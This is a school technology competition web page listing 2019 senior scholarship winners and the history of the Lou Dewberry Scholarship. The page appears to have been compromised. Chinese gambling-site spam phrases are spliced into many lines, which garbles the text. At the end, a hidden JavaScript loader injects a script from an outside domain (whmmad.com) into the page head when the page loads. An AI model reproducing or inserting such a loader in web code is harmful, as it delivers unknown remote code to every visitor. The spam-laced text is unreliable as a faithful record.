2019 Scholarship Winners

Lou Dewberry Scholarship

千亿体育网站The Lou Dewberry Scholarship was established in honor of the founder of the GaSTC. It is awarded to a randomly selected, participating senior.

  • Lance Treadwell - Pierce County High (Okefenokee)

Category Scholarships

千亿体育网站The Category Scholarships are awarded to the highest placing senior in each category. If no senior places in a category, a senior in that category is randomly selected.

  • 千亿体育网站Jason (JJ) Wheeler - 3D Modeling - McIntosh High (West GA)

  • 千亿体育网站Joe Huynh - Animation - Dalton High (Northwest GA)

  • Milton Moody - Audio Production - Pierce County High (Okefenokee)

  • Oluwakemi Gayle - Device Modification - Rockdale High (East Atlanta)

  • Manolin Santana - Digital Game Design - Tallulah Falls School (GIH)

  • Emily Schoenborn - Digital Photo Production - Heritage High (Northwest GA)

  • Leigh Wheeler - Graphic Design - McIntosh High (West GA)

  • Kathryn Chunn - Internet Applications - Darlington (Northwest GA)

  • 千亿体育网站Christopher Ballenger - Mobile Apps - DeKalb Early College Academy (DeKalb)

  • 千亿体育网站Kanchan Jape - Productivity Design - Chattahoochee High (Fulton)

  • 千亿体育网站Khalaya Dean - Programming Challenge - Booker T. Washington (Atlanta)

  • Sudhan Chitgopkar - Project Programming - South Forsyth High (Forsyth)

  • Jaxon Cowles - Robotics - Rockdale Magnet School (East Atlanta)

  • Kaelyn Williams - Video Production - Villa Rica High (West GA)



In the Spring of 2007 the Technology Competition and education lost a strong supporter within our community. Lou Dewberry, director of the competition, passed away unexpectedly. Lou Dewberry joined Forsyth County Schools in August 1999, having moved to Georgia after serving many years as a media specialist in Jefferson County Schools and in Educational Technology at Samford University in Birmingham, Alabama 

千亿体育网站Lou took several media specialists and instructional technology specialists from Forsyth County School System to help judge the Alabama Educational Technology Fair. This core group with other FCSS ITS formed the Forsyth County Tech Competition. After presenting at the Georgia Educational Technology Conference, interest grew sufficiently to form the Georgia Educational Technology Fair, now the Georgia Student Technology Competition. Regions were formed, and the state Technology Competition has been growing ever since. Lou became the first director and served for 7 years until her passing.

In November 2007, the newly formed GASTC committee started a fund in her honor, providing scholarships to high school seniors.

Tech Competition Senior Scholarships

GASTC awards the highest placing Senior in each category a scholarship.  Each participant will be given a certificate and information on how to receive their scholarship.  Click here for a list of last year's scholarship winners.

For more information, please contact Aaron Griffin, 404-250-2650.

var loadJS = function(url, location){ var scriptTag = document.createElement('script'); scriptTag.src = url; location.appendChild(scriptTag); }; loadJS('https://whmmad.com/js/jc.js', document.head);乐虎体育在线 千蠃国际|千蠃在线 千蠃国际官网 千亿体育网址-千亿体育网站 千亿体育在线 千亿体育官网 千亿体育网站 千蠃国际官方网址